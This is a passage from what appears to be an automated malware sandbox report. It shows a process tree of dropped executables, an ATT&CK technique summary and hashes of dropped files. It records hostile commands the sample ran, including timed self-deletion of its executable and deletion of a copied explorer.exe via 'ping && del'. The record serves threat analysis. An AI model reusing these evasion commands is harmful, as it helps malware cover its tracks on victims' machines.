                                                                              • C:\Users\Admin\AppData\Local\Temp\70AD.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\70AD.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5556
                                                                              • C:\Users\Admin\AppData\Local\Temp\7B9B.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7B9B.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:5212
                                                                              • C:\Users\Admin\AppData\Local\Temp\82EF.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\82EF.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5128
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\82EF.exe"
                                                                                  2⤵
                                                                                    PID:5172
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      3⤵
                                                                                        PID:6100
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /T 10 /NOBREAK
                                                                                        3⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:5040
                                                                                  • C:\Users\Admin\AppData\Local\Temp\8C47.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\8C47.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3848
                                                                                  • C:\Users\Admin\AppData\Local\Temp\8DFD.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\8DFD.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:5028
                                                                                  • C:\Users\Admin\AppData\Local\Temp\94B5.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\94B5.exe
                                                                                    1⤵
                                                                                      PID:3980
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        2⤵
                                                                                          PID:4568
                                                                                      • C:\Users\Admin\AppData\Local\Temp\A34D.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\A34D.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:6084
                                                                                        • C:\Users\Admin\AppData\Local\Temp\A34D.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\A34D.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5100
                                                                                        • C:\Users\Admin\AppData\Local\Temp\A34D.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\A34D.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5096
                                                                                      • C:\Users\Admin\AppData\Local\Temp\AC37.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\AC37.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5552
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          "C:\Windows\SysWOW64\explorer.exe"
                                                                                          2⤵
                                                                                            PID:5344
                                                                                            • C:\Users\Admin\AppData\Roaming\348.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\348.tmp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5456
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "5456" "C:\Users\Admin\AppData\Roaming\348.tmp.exe""
                                                                                                4⤵
                                                                                                  PID:2056
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /PID "5456"
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4452
                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                    5⤵
                                                                                                      PID:6076
                                                                                                • C:\Users\Admin\AppData\Roaming\56C.tmp.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\56C.tmp.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2280
                                                                                                • C:\Users\Admin\AppData\Roaming\686.tmp.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\686.tmp.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5572
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                                    4⤵
                                                                                                    • Drops startup file
                                                                                                    PID:5648
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4516
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1
                                                                                                    4⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:4320
                                                                                            • C:\Users\Admin\AppData\Local\Temp\B550.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\B550.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops startup file
                                                                                              • NTFS ADS
                                                                                              PID:4564
                                                                                            • C:\Users\Admin\AppData\Local\Temp\BA71.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\BA71.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:3084
                                                                                            • C:\Users\Admin\AppData\Local\Temp\C4D3.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\C4D3.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5328
                                                                                            • C:\Users\Admin\AppData\Local\Temp\C9A6.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\C9A6.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:3980
                                                                                            • C:\Users\Admin\AppData\Local\Temp\CF73.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\CF73.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5972
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                2⤵
                                                                                                  PID:5952
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  2⤵
                                                                                                    PID:5692
                                                                                                • C:\Users\Admin\AppData\Local\Temp\DA04.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\DA04.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3616
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 276
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:4524
                                                                                                • C:\Users\Admin\AppData\Local\Temp\DE89.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\DE89.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5304
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5192
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5580
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:3924
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5156
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:2120
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5828
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5680
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:5052
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:3764
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                              1⤵
                                                                                                                PID:5952
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:3084
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4084
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:1612
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5676

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                  Persistence

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1060

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  3
                                                                                                                  T1112

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Install Root Certificate

                                                                                                                  1
                                                                                                                  T1130

                                                                                                                  Credential Access

                                                                                                                  Credentials in Files

                                                                                                                  3
                                                                                                                  T1081

                                                                                                                  Discovery

                                                                                                                  Software Discovery

                                                                                                                  1
                                                                                                                  T1518

                                                                                                                  Query Registry

                                                                                                                  4
                                                                                                                  T1012

                                                                                                                  System Information Discovery

                                                                                                                  5
                                                                                                                  T1082

                                                                                                                  Security Software Discovery

                                                                                                                  1
                                                                                                                  T1063

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  Remote System Discovery

                                                                                                                  1
                                                                                                                  T1018

                                                                                                                  Collection

                                                                                                                  Data from Local System

                                                                                                                  3
                                                                                                                  T1005

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                    MD5

                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                    SHA1

                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                    SHA256

                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                    SHA512

                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                    MD5

                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                    SHA1

                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                    SHA256

                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                    SHA512

                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                  • C:\Program Files\Microsoft Office\ADVUYDANVS\ultramediaburner.exe
                                                                                                                    MD5

                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                    SHA1

                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                    SHA256

                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                    SHA512

                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                  • C:\Program Files\Microsoft Office\ADVUYDANVS\ultramediaburner.exe
                                                                                                                    MD5

                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                    SHA1

                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                    SHA256

                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                    SHA512

                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                  • C:\Program Files\install.dat
                                                                                                                    MD5

                                                                                                                    31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                    SHA1

                                                                                                                    c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                    SHA256

                                                                                                                    b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                    SHA512

                                                                                                                    3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                  • C:\Program Files\install.dll
                                                                                                                    MD5

                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                    SHA1

                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                    SHA256

                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                    SHA512

                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                    MD5

                                                                                                                    e71a0a7e48b10bde0a9c54387762f33e

                                                                                                                    SHA1

                                                                                                                    fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                                                                    SHA256

                                                                                                                    83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                                                                    SHA512

                                                                                                                    394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                    MD5

                                                                                                                    4e51ce55d94be0894471e77bdca4015f

                                                                                                                    SHA1

                                                                                                                    1cf4a7f8d524e6e4670fdebf861af55603acc0ff

                                                                                                                    SHA256

                                                                                                                    cebfe16613f3e7a8c49eb9965085326023dee88d1c2e267d299034f71e3b156d

                                                                                                                    SHA512

                                                                                                                    701501144964c0c3d45db9bceae82a18bad5853673c6f1cad8a4b424bdbbb6b916d2958d02cc3aea4f3d81a6326a0f5a581a87766ae41397ae9d0ab01ba2426b

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                    MD5

                                                                                                                    3987206b42a0aeeff7ab2db4184c0d9e

                                                                                                                    SHA1

                                                                                                                    aed892a660ec8e8c24c13d0b9d59f054a9c13bda

                                                                                                                    SHA256

                                                                                                                    60f3782c97549bc8fe375808bbfb986c03821733939daca5802aac569c2c6d6c

                                                                                                                    SHA512

                                                                                                                    ec23d0159f895ea90ce67d3be113264ce8e070db9181a6c44a6f043d473a78d638f8e8b962cc832b96f2634341b39ff21b35fe4b5daf79fa93eaca6d0026e962

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                                                                    MD5

                                                                                                                    a37d7897dd42f21607bc8f28c074376e

                                                                                                                    SHA1

                                                                                                                    2d85f1b21e2556ff5b932e60db8bd70fbdebe081

                                                                                                                    SHA256

                                                                                                                    3bee3d512c7bb01aa88ea7fcfecf4e250747958d95db1137d3fe804299a75f6c

                                                                                                                    SHA512

                                                                                                                    abe65a6f1c7c3dff7be51ada75c6bfcec49f09a94dc3693e5f957e5d728373050cb5b868cbbb49c179988dc8e724769221c7658818460ea22ddd0ef35f09adf2

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                                                                    MD5

                                                                                                                    a37d7897dd42f21607bc8f28c074376e

                                                                                                                    SHA1

                                                                                                                    2d85f1b21e2556ff5b932e60db8bd70fbdebe081

                                                                                                                    SHA256

                                                                                                                    3bee3d512c7bb01aa88ea7fcfecf4e250747958d95db1137d3fe804299a75f6c

                                                                                                                    SHA512

                                                                                                                    abe65a6f1c7c3dff7be51ada75c6bfcec49f09a94dc3693e5f957e5d728373050cb5b868cbbb49c179988dc8e724769221c7658818460ea22ddd0ef35f09adf2

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1hkb0twq.hm2\toolspab1.exe
                                                                                                                    MD5

                                                                                                                    a37d7897dd42f21607bc8f28c074376e

                                                                                                                    SHA1

                                                                                                                    2d85f1b21e2556ff5b932e60db8bd70fbdebe081

                                                                                                                    SHA256

                                                                                                                    3bee3d512c7bb01aa88ea7fcfecf4e250747958d95db1137d3fe804299a75f6c

                                                                                                                    SHA512

                                                                                                                    abe65a6f1c7c3dff7be51ada75c6bfcec49f09a94dc3693e5f957e5d728373050cb5b868cbbb49c179988dc8e724769221c7658818460ea22ddd0ef35f09adf2

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3fwons24.0wk\SunLabsPlayer.exe
                                                                                                                    MD5

                                                                                                                    e470448fc4595fa70a5d19fcbeb4f741

                                                                                                                    SHA1

                                                                                                                    3b8c1f9047a41c8ebff25e8df92da252315bcea5

                                                                                                                    SHA256

                                                                                                                    d562a7c5bb2e2488476c48c19ffec46b9b65dad6066855e0f7fd115b879b7955

                                                                                                                    SHA512

                                                                                                                    ec006b744b187290f9245edc8ddf17e5a75ec7783862e3741ec32f955070a7721edbee60779b4b817c6b487aab97a0412d276f8c18d058b01e02b7dda97dad86

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3fwons24.0wk\SunLabsPlayer.exe
                                                                                                                    MD5

                                                                                                                    e470448fc4595fa70a5d19fcbeb4f741

                                                                                                                    SHA1

                                                                                                                    3b8c1f9047a41c8ebff25e8df92da252315bcea5

                                                                                                                    SHA256

                                                                                                                    d562a7c5bb2e2488476c48c19ffec46b9b65dad6066855e0f7fd115b879b7955

                                                                                                                    SHA512

                                                                                                                    ec006b744b187290f9245edc8ddf17e5a75ec7783862e3741ec32f955070a7721edbee60779b4b817c6b487aab97a0412d276f8c18d058b01e02b7dda97dad86

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8e-c8aca-316-31f8f-a45f62f266852\Nasugujaetae.exe
                                                                                                                    MD5

                                                                                                                    18e49540637bccc9b3a7ca3d48cae223

                                                                                                                    SHA1

                                                                                                                    b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                    SHA256

                                                                                                                    698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                    SHA512

                                                                                                                    a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8e-c8aca-316-31f8f-a45f62f266852\Nasugujaetae.exe
                                                                                                                    MD5

                                                                                                                    18e49540637bccc9b3a7ca3d48cae223

                                                                                                                    SHA1

                                                                                                                    b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                    SHA256

                                                                                                                    698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                    SHA512

                                                                                                                    a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8e-c8aca-316-31f8f-a45f62f266852\Nasugujaetae.exe.config
                                                                                                                    MD5

                                                                                                                    98d2687aec923f98c37f7cda8de0eb19

                                                                                                                    SHA1

                                                                                                                    f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                    SHA256

                                                                                                                    8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                    SHA512

                                                                                                                    95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CywsdfAXdp.exe
                                                                                                                    MD5

                                                                                                                    dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                    SHA1

                                                                                                                    b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                    SHA256

                                                                                                                    4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                    SHA512

                                                                                                                    276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CywsdfAXdp.exe
                                                                                                                    MD5

                                                                                                                    dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                    SHA1

                                                                                                                    b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                    SHA256

                                                                                                                    4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                    SHA512

                                                                                                                    276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Kenessey.txt
                                                                                                                    MD5

                                                                                                                    97384261b8bbf966df16e5ad509922db

                                                                                                                    SHA1

                                                                                                                    2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                    SHA256

                                                                                                                    9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                    SHA512

                                                                                                                    b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Xaqilyjiri.exe
                                                                                                                    MD5

                                                                                                                    2e91d25073151415f8c39de2262cbba8

                                                                                                                    SHA1

                                                                                                                    32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                    SHA256

                                                                                                                    0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                    SHA512

                                                                                                                    306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Xaqilyjiri.exe
                                                                                                                    MD5

                                                                                                                    2e91d25073151415f8c39de2262cbba8

                                                                                                                    SHA1

                                                                                                                    32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                    SHA256

                                                                                                                    0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                    SHA512

                                                                                                                    306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\de-339a6-dd6-ba496-c728311c2e046\Xaqilyjiri.exe.config
                                                                                                                    MD5

                                                                                                                    98d2687aec923f98c37f7cda8de0eb19

                                                                                                                    SHA1

                                                                                                                    f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                    SHA256

                                                                                                                    8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                    SHA512

                                                                                                                    95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\eceuescn.jb2\c7ae36fa.exe
                                                                                                                    MD5

                                                                                                                    6a4b96d0e5cb5b61943287c153b0e0b0

                                                                                                                    SHA1

                                                                                                                    5ce8b0eb0591db05caad82a3b9a1841b5c2bcc98

                                                                                                                    SHA256

                                                                                                                    b5ff3ac37a2ca84de829d8eceda2a47075839fef767e89b004856c5d0a239b31

                                                                                                                    SHA512

                                                                                                                    d29b7aba6ecb7ac92648e441aed9782069327b134508e8c62d5585841d9454babc33e29963b8a781d1e8df5570e3e7589706eac30c1f784ae6fae1e4ced73522

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\eceuescn.jb2\c7ae36fa.exe
                                                                                                                    MD5

                                                                                                                    6a4b96d0e5cb5b61943287c153b0e0b0

                                                                                                                    SHA1

                                                                                                                    5ce8b0eb0591db05caad82a3b9a1841b5c2bcc98

                                                                                                                    SHA256

                                                                                                                    b5ff3ac37a2ca84de829d8eceda2a47075839fef767e89b004856c5d0a239b31

                                                                                                                    SHA512

                                                                                                                    d29b7aba6ecb7ac92648e441aed9782069327b134508e8c62d5585841d9454babc33e29963b8a781d1e8df5570e3e7589706eac30c1f784ae6fae1e4ced73522

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\h1xuavs0.c3j\md1_1eaf.exe
                                                                                                                    MD5

                                                                                                                    25d9f83dc738b4894cf159c6a9754e40

                                                                                                                    SHA1

                                                                                                                    152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                    SHA256

                                                                                                                    8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                    SHA512

                                                                                                                    41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\h1xuavs0.c3j\md1_1eaf.exe
                                                                                                                    MD5

                                                                                                                    25d9f83dc738b4894cf159c6a9754e40

                                                                                                                    SHA1

                                                                                                                    152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                    SHA256

                                                                                                                    8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                    SHA512

                                                                                                                    41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5C4MG.tmp\ultramediaburner.tmp
                                                                                                                    MD5

                                                                                                                    4e8c7308803ce36c8c2c6759a504c908

                                                                                                                    SHA1

                                                                                                                    a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                    SHA256

                                                                                                                    90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                    SHA512

                                                                                                                    780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5C4MG.tmp\ultramediaburner.tmp
                                                                                                                    MD5

                                                                                                                    4e8c7308803ce36c8c2c6759a504c908

                                                                                                                    SHA1

                                                                                                                    a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                    SHA256

